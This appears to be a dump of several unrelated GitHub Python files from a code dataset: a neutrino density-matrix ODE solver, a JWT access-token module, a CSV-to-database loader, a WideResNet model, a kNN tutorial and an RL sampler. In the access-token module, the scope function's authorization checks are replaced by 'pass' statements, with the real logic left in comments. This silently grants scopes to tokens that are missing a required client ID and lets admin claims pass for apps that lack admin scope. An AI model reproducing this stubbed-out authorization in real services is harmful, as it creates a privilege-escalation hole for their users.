# ============================\n # Create data folder and change the path\n DATA_FOLDER= RESULTS_SIMULATION_DIR+ 'data/'\n if not osCommand.path.exists(DATA_FOLDER):\n osCommand.makedirs(DATA_FOLDER)\n print(tLog.OK+\"Data Folder Created.\")\n else:\n print(tLog.ERROR+\"Data Folder Already Exists. Check The Folder: \"+ DATA_FOLDER)\n print(tLog.EXIT)\n if init.technicalParametersDic['holdIntermediateData']:\n # Create intermediateData folder\n INTERMEDIATE_DATA_FOLDER= RESULTS_SIMULATION_DIR+ 'data/intermediateData/'\n if not osCommand.path.exists(INTERMEDIATE_DATA_FOLDER):\n osCommand.makedirs(INTERMEDIATE_DATA_FOLDER)\n print(tLog.OK+\"Intermediate Data Folder Created.\")\n else:\n print(tLog.ERROR\\\n +\"Intermediate Data Folder Already Exists. Check The Folder: \"\\\n + INTERMEDIATE_DATA_FOLDER)\n print(tLog.EXIT)\n # Change directory to data \n # Code saves intermediate data\n osCommand.chdir(DATA_FOLDER)\n # ============================\n # Copy initial parameters\n #copy_tree('../../../parameters/', '.')\n #np.savez('rhoInit_flav.npz', rhoInit_flav=init.rhoInit_flav)\n # ============================ \n \n # ============================\n # Solve E.o.M.\n # Starting time\n print(tLog.INFO+'Start solving E.o.M with odeintw. 
Current date and time :'\\\n , timeInitialDate.strftime(\"%Y-%m-%d %H:%M:%S\"))\n # Hold intermediate data\n if init.technicalParametersDic['holdIntermediateData']:\n if init.dim_rho_2totFlav_Bool:\n # Default error tolerances\n if (init.technicalParametersDic['tolerance_relativeError'] == 0\\\n and init.technicalParametersDic['tolerance_absoluteError'] == 0):\n if init.totFlav == 2:\n # Two Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs2Flav_bigRho, init.rhoInit_flav, init.distAll_km\\\n , full_output=True, mxstep=500000000)\n elif init.totFlav == 3:\n # Three Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs3Flav_bigRho, init.rhoInit_flav, init.distAll_km\\\n , full_output=True, mxstep=500000000)\n elif init.totFlav == 4:\n # Four Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs4Flav_bigRho, init.rhoInit_flav, init.distAll_km\\\n , full_output=True, mxstep=500000000)\n # User defined error tolerances\n else:\n if init.totFlav == 2:\n # Two Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs2Flav_bigRho, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n elif init.totFlav == 3:\n # Three Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs3Flav_bigRho, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n elif init.totFlav == 4:\n # Four Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs4Flav_bigRho, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n else:\n # Default error tolerances\n if (init.technicalParametersDic['tolerance_relativeError'] == 0\\\n and init.technicalParametersDic['tolerance_absoluteError'] == 0):\n if init.totFlav == 2:\n # Two Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs2Flav, init.rhoInit_flav, init.distAll_km\\\n , full_output=True, mxstep=500000000)\n elif init.totFlav == 3:\n # Three Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs3Flav, init.rhoInit_flav, init.distAll_km\\\n , full_output=True, mxstep=500000000)\n elif init.totFlav == 4:\n # Four Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs4Flav, init.rhoInit_flav, init.distAll_km\\\n , full_output=True, mxstep=500000000) \n # User defined error tolerances\n else:\n if init.totFlav == 2:\n # Two Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs2Flav, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n elif init.totFlav == 3:\n # Three Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs3Flav, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n elif init.totFlav == 4:\n # Four Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs4Flav, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , 
rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n else:\n if init.dim_rho_2totFlav_Bool:\n # Default error tolerances\n if (init.technicalParametersDic['tolerance_relativeError'] == 0\\\n and init.technicalParametersDic['tolerance_absoluteError'] == 0):\n if init.totFlav == 2:\n # Two Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs2Flav_bigRho_noInterData\\\n , init.rhoInit_flav, init.distAll_km\\\n , full_output=True, mxstep=500000000)\n elif init.totFlav == 3:\n # Three Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs3Flav_bigRho_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , mxstep=500000000)\n elif init.totFlav == 4:\n # Four Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs4Flav_bigRho_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , mxstep=500000000)\n # User defined error tolerances\n else:\n if init.totFlav == 2:\n # Two Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs2Flav_bigRho_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n elif init.totFlav == 3:\n # Three Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs3Flav_bigRho_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n elif init.totFlav == 4:\n # Four Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs4Flav_bigRho_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n else:\n # Default error tolerances\n if (init.technicalParametersDic['tolerance_relativeError'] == 0\\\n and init.technicalParametersDic['tolerance_absoluteError'] == 0):\n if init.totFlav == 2:\n # Two Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs2Flav_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , mxstep=500000000)\n elif init.totFlav == 3:\n # Three Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs3Flav_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , mxstep=500000000)\n elif init.totFlav == 4:\n # Four Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs4Flav_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , mxstep=500000000) \n # User defined error tolerances\n else:\n if init.totFlav == 2:\n # Two Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs2Flav_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n elif init.totFlav == 3:\n # Three Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs3Flav_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n elif init.totFlav == 4:\n # Four 
Flavor\n rhoFinalAll,infow = integralSolver.odeintw(\\\n func.rhs4Flav_noInterData, init.rhoInit_flav\\\n , init.distAll_km, full_output=True\\\n , rtol=init.technicalParametersDic['tolerance_relativeError']\\\n , atol=init.technicalParametersDic['tolerance_absoluteError']\\\n , mxstep=500000000)\n # ============================ \n \n # ============================ \n print(tLog.OK+'Finish solving E.o.M with odeintw. Current date and time :'\\\n , timeInitialDate.strftime(\"%Y-%m-%d %H:%M:%S\"))\n # Stop Calculating time\n timeFinalClock = time.time()\n # ============================\n # Calculate Elapsed Time\n tmpTimeCalculation = timeFinalClock-timeInitialClock\n # Define temporary time elapsed in second\n tmpTimeCalculationSec = 0\n # Hold it\n tmpTimeCalculationSec = tmpTimeCalculation\n # Print the time values\n days = tmpTimeCalculation // (24 * 3600)\n tmpTimeCalculation = tmpTimeCalculation % (24 * 3600)\n hours = tmpTimeCalculation // 3600\n tmpTimeCalculation %= 3600\n minutes = tmpTimeCalculation // 60\n tmpTimeCalculation %= 60\n seconds = tmpTimeCalculation\n print(tLog.INFO+\"Total Process Time, %6.2fs, d:h:m:s : %d:%d:%d:%d\"% (\\\n tmpTimeCalculationSec, days, hours, minutes, seconds))\n # ============================\n # Save Total Process Time to file\n # Do not color the [INFO]\n fileObject = open('distanceAndTime.log','a+')\n print('Total Process Time, %6.2fs, d:h:m:s : %d:%d:%d:%d'% (\\\n tmpTimeCalculationSec, days, hours, minutes, seconds), file=fileObject)\n fileObject.close()\n # ============================\n # Number Of Evolution\n print(tLog.INFO+'Number of evaluation: %d' % infow['nfe'][-1])\n # ============================\n # Check differential equation solver method changed or not\n methodIndicators = infow['mused']\n if methodIndicators[0] == 1:\n print(tLog.INFO+'Differential equation solver started with'\\\n ' Adams (nonstiff) method.')\n else:\n print(tLog.INFO+'Differential equation solver started with bdf (stiff) method.')\n indicatorChangePrint = [tLog.INFO\\\n +'Differential equation solver method is Adams (nonstiff)'\\\n , tLog.INFO+'Differential equation solver method is bdf (stiff) ']\n # ============================\n # If tmpIndicatorCheckControl == 1, the method changed.\n tmpIndicatorCheckControl = 0\n tmpIndicator = 0\n tmpIndicator = methodIndicators[0]\n # ============================\n # Check all steps, method is changed or not\n for it_methodIndicator in range(len(methodIndicators)):\n if methodIndicators[it_methodIndicator] != tmpIndicator:\n tmpIndicatorCheckControl = 1\n # Method changed\n if methodIndicators[it_methodIndicator] == 1:\n # To nonstiff\n print(str(indicatorChangePrint[0])+' at distance '\\\n +str(init.distAll_km[it_methodIndicator])+'.')\n tmpIndicator = methodIndicators[it_methodIndicator]\n if methodIndicators[it_methodIndicator] == 2:\n # To stiff\n print(str(indicatorChangePrint[1])+' at distance '\\\n +str(init.distAll_km[it_methodIndicator])+'.')\n tmpIndicator=methodIndicators[it_methodIndicator]\n # ============================\n # Print if the method is changed or not\n if tmpIndicatorCheckControl == 0:\n print(tLog.INFO+'Differential equation solver method have not changed.')\n elif tmpIndicatorCheckControl == 1:\n print(tLog.INFO+'Differential equation solver method have changed.')\n # ============================\n '''\n ALL INFOS\n 'hu' vector of step sizes successfully used for each time step.\n 'tcur' vector with the value of t reached for each time step.\n (will always be at least as large as the input 
times).\n 'tolsf' vector of tolerance scale factors, greater than 1.0,\n computed when a request for too much accuracy was detected.\n 'tsw' value of t at the time of the last method switch\n (given for each time step)\n 'nst' cumulative number of time steps\n 'nfe' cumulative number of function evaluations for each time step\n 'nje' cumulative number of jacobian evaluations for each time step\n 'nqu' a vector of method orders for each successful step.\n 'imxer' index of the component of largest magnitude in the weighted\n local error vector (e / ewt) on an error return, -1 otherwise.\n 'lenrw' the length of the double work array required.\n 'leniw' the length of integer work array required.\n 'mused' a vector of method indicators for each successful time step:\n 1: adams (nonstiff), 2: bdf (stiff)\n '''\n # ============================\n if init.technicalParametersDic['holdIntermediateData']:\n # Remove intermediateData folder\n rmtree(INTERMEDIATE_DATA_FOLDER)\n # Return Back To RESULTS_SIMULATION_DIR Folder\n osCommand.chdir(RESULTS_SIMULATION_DIR)\n\n return rhoFinalAll","repo_name":"bulmust/collNuPy","sub_path":"modules/diffSolvers.py","file_name":"diffSolvers.py","file_ext":"py","file_size_in_byte":18371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"31497065343","text":"import os\nimport time\nfrom binascii import hexlify\n\nimport jwt\n\nfrom abe import database as db\n\nADMIN_EMAILS = os.environ.get('ADMIN_EMAILS', '').split(',')\nOAUTH_REQUIRES_CLIENT_ID = os.environ.get('OAUTH_REQUIRES_CLIENT_ID')\n\nACCESS_TOKEN_SECRET = (os.environ.get('ACCESS_TOKEN_SECRET') or hexlify(os.urandom(32)))\n\nAUTHENTICATED_USER_CLAIMS = [\n 'create:events', 'edit:events', 'delete:events',\n 'create:ics',\n 'read:all_events',\n 'read:labels',\n]\n\nADMIN_USER_CLAIMS = AUTHENTICATED_USER_CLAIMS + [\n 'create:protected_events', 'edit:protected_events', 'delete:protected_events',\n 'create:labels', 'edit:labels', 'delete:labels',\n 'admin:apps',\n]\n\n\ndef create_access_token(**params):\n payload = {}\n payload.update(params)\n payload.update({'iat': int(time.time())})\n token = jwt.encode(payload, ACCESS_TOKEN_SECRET, algorithm='HS256').decode()\n return token\n\n\ndef get_access_token_provider(token):\n if is_valid_token(token):\n payload = jwt.decode(token.encode(), ACCESS_TOKEN_SECRET, algorithms='HS256')\n return payload.get('provider')\n return None\n\n\ndef get_access_token_role(token):\n if is_valid_token(token):\n payload = jwt.decode(token.encode(), ACCESS_TOKEN_SECRET, algorithms='HS256')\n return 'admin' if payload.get('email') in ADMIN_EMAILS else 'user'\n return None\n\n\ndef access_token_scopes(token):\n # The scope is computed based on the token's role, so that tokens stay\n # valid if the role -> scope map changes.\n scope = []\n if is_valid_token(token):\n payload = jwt.decode(token.encode(), ACCESS_TOKEN_SECRET, algorithms='HS256')\n app = None\n if 'client_id' in payload:\n app = db.App.objects(client_id=payload['client_id']).first()\n if not app and OAUTH_REQUIRES_CLIENT_ID:\n pass # return scope\n role = get_access_token_role(token)\n if app and 'admin:*' not in app.scopes:\n pass # role == 'user'\n scope = ADMIN_USER_CLAIMS if role == 'admin' else AUTHENTICATED_USER_CLAIMS\n return scope\n\n\ndef is_valid_token(token):\n if not token:\n return False\n try:\n jwt.decode(token.encode(), ACCESS_TOKEN_SECRET, algorithms='HS256') # for effect\n except Exception:\n return False\n return 
True\n","repo_name":"olin-build/ABE","sub_path":"abe/auth/access_tokens.py","file_name":"access_tokens.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"33"} +{"seq_id":"2760330654","text":"import pandas as pd, os\nfrom tortoise import Tortoise, run_async\n\nfrom gps_app.logic import DeviceLocationManager\nfrom gps_app.config import DBURL\n\ncsv_file = \"./static/raw_data.csv\"\n\nasync def connect_to_db()->None:\n await Tortoise.init(\n db_url=DBURL,\n modules={\"models\": [\"gps_app.models\"]}\n )\n\nasync def save_to_db(csv_file=csv_file):\n df = pd.read_csv(csv_file)\n df.sort_values('sts')\n for _, row in df.iterrows():\n data = {}\n data[\"device_id\"]=row[\"device_fk_id\"]\n data[\"latitude\"]=row[\"latitude\"]\n data[\"longitude\"]=row[\"longitude\"]\n data[\"timestamp\"]=row[\"time_stamp\"]\n data[\"sts\"]=row[\"sts\"]\n data[\"speed\"]=row[\"speed\"]\n await connect_to_db()\n await DeviceLocationManager.save_location(location_data=data)\n\ndef save_data_to_db_and_cache():\n run_async(save_to_db())","repo_name":"sineshashi/GPSTracker","sub_path":"scripts/migrate_from_excel.py","file_name":"migrate_from_excel.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"32152599607","text":"from torch import nn\nimport numpy as np\n\nfrom .layers import Mixup, NormLinear\n\nclass ResidualBlock(nn.Module):\n def __init__(self, c_in, c_out, downsample=False) -> None:\n super(ResidualBlock, self).__init__()\n transform_residual = (c_in != c_out)\n self.bn1 = nn.BatchNorm2d(c_in)\n self.relu1 = nn.ReLU()\n self.block = []\n if downsample or transform_residual:\n if not downsample:\n stride = 1\n else:\n stride = 2\n self.block+= [nn.Conv2d(c_in, c_out, kernel_size=3, padding=1, stride=stride)]\n self.residual_conv = nn.Conv2d(c_in, c_out, kernel_size=1, padding=0, stride=stride)\n else:\n self.block+= [nn.Conv2d(c_out, c_out, kernel_size=3, padding=1)]\n self.residual_conv = None\n \n self.block+= [\n nn.BatchNorm2d(c_out),\n nn.ReLU(),\n nn.Conv2d(c_out, c_out, kernel_size=3, padding=1)]\n self.block = nn.Sequential(*self.block)\n\n def forward(self, x):\n if self.residual_conv is not None:\n x = self.relu1(self.bn1(x))\n return self.block(x) + self.residual_conv(x)\n return self.block(self.relu1(self.bn1(x))) + x\n\n\nclass WideResnet(nn.Module):\n def __init__(self, num_layers: int, num_classes: int = 10, num_channels: int = 160, num_input_channels: int = 3) -> None:\n super(WideResnet, self).__init__()\n if num_layers%6 != 2:\n raise AssertionError(\"num_layers has to equal 2 mod 6\")\n num_blocks = (num_layers-2)//6\n num_channels = [16, num_channels, num_channels * 2, num_channels * 4]\n self.conv1 = nn.Conv2d(num_input_channels, num_channels[0], kernel_size=3, padding=1)\n self.num_layers = len(num_channels)-1\n for i in range(1, len(num_channels)):\n block = []\n for j in range(num_blocks):\n downsample = False\n if j == 0 and i != 1:\n downsample = True\n if j == 0:\n block.append(ResidualBlock(num_channels[i-1], num_channels[i], downsample=downsample))\n else:\n block.append(ResidualBlock(num_channels[i], num_channels[i]))\n setattr(self, f\"layer{i}\", nn.Sequential(*block))\n self.relu = nn.ReLU()\n self.pool = nn.AdaptiveAvgPool2d(1)\n self.flatten = nn.Flatten()\n self.linear = NormLinear(num_channels[-1], num_classes)\n self.mixup = Mixup()\n\n def forward(self, x, labels=None, 
lambda_=None):\n mixup_level = None\n if lambda_ is not None:\n mixup_level = np.random.randint(0, self.num_layers+1)\n if mixup_level == 0:\n x, labels1, labels2 = self.mixup(x, labels, lambda_)\n x = self.conv1(x)\n for i in range(self.num_layers):\n layer = getattr(self, f\"layer{i+1}\")\n x = layer(x)\n if i+1 == mixup_level:\n x, labels1, labels2 = self.mixup(x, labels, lambda_)\n x = self.relu(x)\n x = self.pool(x)\n x = self.flatten(x)\n features = x\n x = self.linear(x)\n if labels is not None:\n return features, x, labels1, labels2\n return features, x\n\n def extract_features(self, x):\n return self.forward(x)[0]\n","repo_name":"KamilPiechowiak/fsl","sub_path":"src/feature_extractors/models/wide_resnet.py","file_name":"wide_resnet.py","file_ext":"py","file_size_in_byte":3348,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"6611364243","text":"from numpy import *\nimport os,sys\nimport operator\nimport numpy as np\nnp.set_printoptions(threshold=np.inf) # 全部显示\n\n# 创建数据\ndef createDataSet():\n\tgroup = array([[1.0,1.1],[1.0,1.0],[0,0],[0,0.1]])\n\tlabels = ['A','A','B','B']\n\treturn group,labels\n\n# k-近邻算法(坐标,坐标数组,对应的类型,前k个数据中最多)\ndef classify0(inX,dataSet,labels,k):\n\t# print(\"**classify0**\")\n\tdataSetSize = dataSet.shape[0] # 数组个数,数据个数\n\tdiffMat = tile(inX,(dataSetSize,1))-dataSet\n\tsqDiffMat = diffMat**2\n\tsqDistance = sqDiffMat.sum(axis=1)\n\tdistance = sqDistance**0.5\n\t# print(distance)\n\tsortedDistIndicies = distance.argsort() #返回从小到大的索引值\n\t# print(sortedDistIndicies)\n\tclassCount = {}\n\tfor i in range(k):\n\t\tvoteIlabel = labels[sortedDistIndicies[i]] # 最小的距离的类别标签\n\t\t # classCount.get(voteIlabel,0)返回字典classCount中voteIlabel元素对应的值,\n\t\t # 若不存在voteIlabel,则字典classCount中生成voteIlabel元素,并使其对应的数字为0\n\t\tclassCount[voteIlabel] = classCount.get(voteIlabel,0)+1 \n\n\t# print(classCount.items())\n\n\t# classCount.items() 获得所有键值对\n\n\t# a = [1,2,3] \n\t# b=operator.itemgetter(1) //定义函数b,获取对象的第1个域的值\n\t# b(a) \n\t# 2 \n\t# b=operator.itemgetter(1,0) //定义函数b,获取对象的第1个域和第0个的值\n \t# b(a) \n # (2, 1) \n\n # reverse=True 降序\n\tsortedClassCount = sorted(classCount.items(),key=operator.itemgetter(1),reverse=True)\n\treturn sortedClassCount[0][0]\n\n# 将文本转换为Numpy 矩阵\ndef file2matrix(filename):\n\tfr = open(filename) # 打开文件\n\tarrayOLines = fr.readlines() # 按行读取 字符串数组\n\tnumberOfLines = len(arrayOLines) # 文件内容行数\n\treturnMat = zeros((numberOfLines,3)) # 根据行数创建以0填充的矩阵\n\n\tclassLabelVector = []\n\tindex = 0\n\n\tfor line in arrayOLines:\n\t\tline = line.strip() # 移除头尾的字符 空格\n\t\tlistFromLine = line.split('\\t') # 根据 \\t 拆分\n\t\t# 将数据前三列提取出来,存放到returnMat的NumPy矩阵中,也就是特征矩阵\n\t\t# [0:3]从第0个取,取3-0个数据 [1:4]从第0个取,取4-1个数据\n\t\treturnMat[index,:] = listFromLine[0:3]\n\t\tif listFromLine[-1] == 'didntLike':\n\t\t\tclassLabelVector.append(1)\n\t\telif listFromLine[-1] == 'smallDoses':\n\t\t\tclassLabelVector.append(2)\n\t\telif listFromLine[-1] == 'largeDoses':\n\t\t\tclassLabelVector.append(3)\n\t\tindex += 1\n\treturn returnMat,classLabelVector\n\n# 归一化特征值 某一数据/(这一列最大值 - 最小值) 百分比0-1之间的数\ndef autoNorm(dataSet):\n\t# dataSet.min()) #无参,所有中的最小值\n\t# dataSet.min(0)) # axis=0; 每列的最小值\n\t# dataSet.min(1)) # axis=1;每行的最小值\n\tminVals = dataSet.min(0)\n\tmaxVals = dataSet.max(0)\n\tranges = maxVals - minVals # 每一列最大值-最小值\n\n\tnormDataSet = zeros(shape(dataSet)) # 归零矩阵\n\n\tm = dataSet.shape[0] # 数组个数 m = 1000\n\n\t# a=[[1,2,3],[5,4]]\n\t# tile(a,[2,3])\n\t# array([[[1, 2, 3], [5, 4], [1, 2, 3], [5, 4], [1, 2, 3], [5, 4]],\n\t# [[1, 2, 
3], [5, 4], [1, 2, 3], [5, 4], [1, 2, 3], [5, 4]]])\n\tnormDataSet = dataSet - tile(minVals,(m,1))\n\tnormDataSet = normDataSet/tile(ranges,(m,1))\n\treturn normDataSet,ranges,minVals\n\ndef datingClassTest():\n\thoRatio = 0.90 # 抽取数量百分比 随机抽取10%\n\tdatingDataMat,datingLabels = file2matrix('datingTestSet.txt') #读取数据\n\tnormMat,ranges,minVals = autoNorm(datingDataMat)\n\tm = normMat.shape[0]\n\tnumTestVecs = int(m*hoRatio) # 测试数据的数量\n\terrorCount = 0.0 # 错误数据的数量\n\n\tfor i in range(numTestVecs):\n\t\t# normMat[i,:] 取二维数组 第i行的所有的数据\n\t\t# normMat[numTestVecs:m,:] # 去除测试数据剩下的数据 二维数组\n\t\t# datingLabels[numTestVecs:m] # 去除测试数据剩下的数据\n\n\t\tclassifierResult = classify0(normMat[i,:],normMat[numTestVecs:m,:],\n\t\t\tdatingLabels[numTestVecs:m],3)\n\t\tprint (\"the classifier came back with:%d,the real answer is:%d\"\n\t\t%(classifierResult,datingLabels[i]))\n\t\tif(classifierResult!=datingLabels[i]):\n\t\t\tprint(\"-----\")\n\t\t\terrorCount += 1.0\n\tprint (\"the total error rate is:%f\"%(errorCount/float(numTestVecs)))\n\n# 是否是想要相亲的对象\ndef classifyPerson():\n\tresultList = ['not at all','in small doses','in large doses']\n\tpercentTats = float(input(\"percentage of time spent playing video games?\"))\n\tffMiles = float(input(\"frequent flier miles earned per year?\"))\n\ticeCream = float(input(\"liters of ice cream consumed per year?\"))\n\tdatingDataMat,datingLabels = file2matrix('datingTestSet.txt')\n\tnormMat,ranges,minVals = autoNorm(datingDataMat)\n\tinArr = array([ffMiles,percentTats,iceCream])\n\tclassifierResult = classify0((inArr-minVals)/ranges,normMat,datingLabels,3)\n\tprint(\"You will probably like this person: \",resultList[classifierResult-1])\n\n# 读取图片\ndef img2Vector(filename):\n\t# returnVect = zeros((1,1024))\n\t# print(returnVect)\n\treturnVect = zeros([1,1024]) # 创建一维数组个数1024\n\tfr = open(filename)\n\tfor i in range(32):\n\t\tlineStr = fr.readline() # 读出每一行数据\n\t\tfor j in range(32):\n\t\t\treturnVect[0,32*i+j] = int(lineStr[j])\n\treturn returnVect\n\n\n# 手写数字识别系统测试代码\ndef handwritingClassTest():\n\thwLabels = [] # 保存所有对应的数字\n\ttrainingFileList = os.listdir('digits/trainingDigits') # 读取文件夹下的所有文件名称\n\tm = len(trainingFileList) # 文件个数\n\ttrainingMat = zeros((m,1024)) # 用于保存数字文件内容\n\tfor i in range(m): # 循环遍历所有文件\n\t\tfileNameStr = trainingFileList[i] # 按顺序获取文件名全称\n\t\tfileStr = fileNameStr.split('.')[0] # 不包括扩展名的文件名\n\t\tclassNumStr = int(fileStr.split('_')[0]) # 获取数字\n\t\thwLabels.append(classNumStr) # 数字数组\n\t\ttrainingMat[i,:] = img2Vector('digits/trainingDigits/%s' % fileNameStr) # 数字内容\n\n\terrorCount = 0.0 #错误率\n\ttestFileList = os.listdir('digits/testDigits') # 测试文件夹下的所有文件名称\n\tmTest = len(testFileList) # 测试文件数量\n\tfor i in range(mTest):\n\t\tfileNameStr = testFileList[i]\n\t\tfileStr = fileNameStr.split('.')[0]\n\t\tclassNumStr = fileNameStr.split('_')[0]\n\t\tvectorUnderTest = img2Vector('digits/testDigits/%s' % fileNameStr)\n\t\tclassifierResult = classify0(vectorUnderTest,trainingMat,hwLabels,3)\n\t\t#print(\"the classifier came back with : %d,the real answer is : %s\"\n\t\t#\t%(classifierResult,classNumStr))\n\t\tif(classifierResult!=int(classNumStr)):\n\t\t\terrorCount += 1.0\n\t\t\tprint(str(fileNameStr) + \":\" + str(classifierResult))\n\tprint (\"\\nthe total number of errors is : %d\" % errorCount)\n\tprint (\"\\nthe total error rate is %f\" % 
(errorCount/float(mTest)))","repo_name":"shangchengwen/machine-learning","sub_path":"kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":6787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"41601813631","text":"import numpy as np\n\nfrom gcg.envs.env import Env\n\nclass Sampler(object):\n def __init__(self, env, policy, replay_pool):\n self._env = OneStepDelayAndHorizonEnvWrapper(env)\n self._policy = policy\n self._replay_pool = replay_pool\n\n self._curr_observation, self._curr_goal = None, None\n\n @property\n def env(self):\n return self._env.env\n\n def step(self, step, take_random_actions=False, explore=True, action=None, goal_override=None, use_labeller=True, **kwargs):\n if self._curr_observation is None or self._curr_goal is None:\n self.reset()\n\n \"\"\" Takes one step and adds to replay pool \"\"\"\n assert (self._env is not None)\n obs_im, obs_vec = curr_obs = self._curr_observation\n curr_goal = self._curr_goal\n if goal_override is not None:\n curr_goal = goal_override\n\n ### store last observations and get encoded\n curr_goal = self._replay_pool.store_observation(step, (obs_im, obs_vec), curr_goal, use_labeller=use_labeller)\n encoded_observation = self._replay_pool.encode_recent_observation()\n\n ### get actions\n action_info = dict()\n if take_random_actions:\n assert (action is None)\n action = self._env.action_selection_space.sample()\n else:\n if action is None:\n action, _, action_info = self._policy.get_action(\n step=step,\n current_episode_step=self._env.current_episode_step,\n observation=encoded_observation,\n goal=curr_goal,\n explore=explore)\n\n ### take step\n next_observation, goal, reward, done, env_info = self._env.step(action, **kwargs)\n env_info.update(action_info)\n\n if done:\n self._policy.reset_get_action()\n\n ### add to replay pool\n self._replay_pool.store_effect(action, reward, done, env_info)\n\n self._curr_observation = next_observation\n self._curr_goal = goal\n\n return curr_obs, curr_goal, action, reward, done, env_info\n\n def reset(self, **kwargs):\n assert (self._env is not None)\n\n self._curr_observation, self._curr_goal = self._env.reset(**kwargs)\n self._replay_pool.force_done()\n\n def get_current_goal(self, labeller=None):\n if labeller:\n return labeller.label(([self._curr_observation[0]], [self._curr_observation[1]]), [self._curr_goal])[0]\n else:\n return self._curr_goal\n\n @property\n def is_done(self):\n return self._env.is_done\n\n\nclass OneStepDelayAndHorizonEnvWrapper(Env):\n\n def __init__(self, env):\n self._env = env\n\n self._t = 0\n self._skip = False\n assert(np.isfinite(self._env.horizon))\n\n @property\n def env(self):\n return self._env\n\n def step(self, action, **kwargs):\n if self._skip:\n next_observation, goal = self._env.reset(**kwargs)\n reward = 0\n done = True\n env_info = dict()\n self._t = 0\n else:\n next_observation, goal, reward, done, env_info = self._env.step(action, **kwargs)\n self._t += 1\n\n if self._t >= self._env.horizon:\n done = True\n\n if self._skip:\n self._skip = False\n elif done:\n # delay done by one timestep\n self._skip = True\n done = False\n\n return next_observation, goal, reward, done, env_info\n\n def reset(self, **kwargs):\n obs, goal = self._env.reset(**kwargs)\n self._t = 0\n self._skip = False\n return obs, goal\n\n @property\n def action_selection_space(self):\n return self._env.action_selection_space\n\n @property\n def current_episode_step(self):\n return self._t\n\n @property\n def 
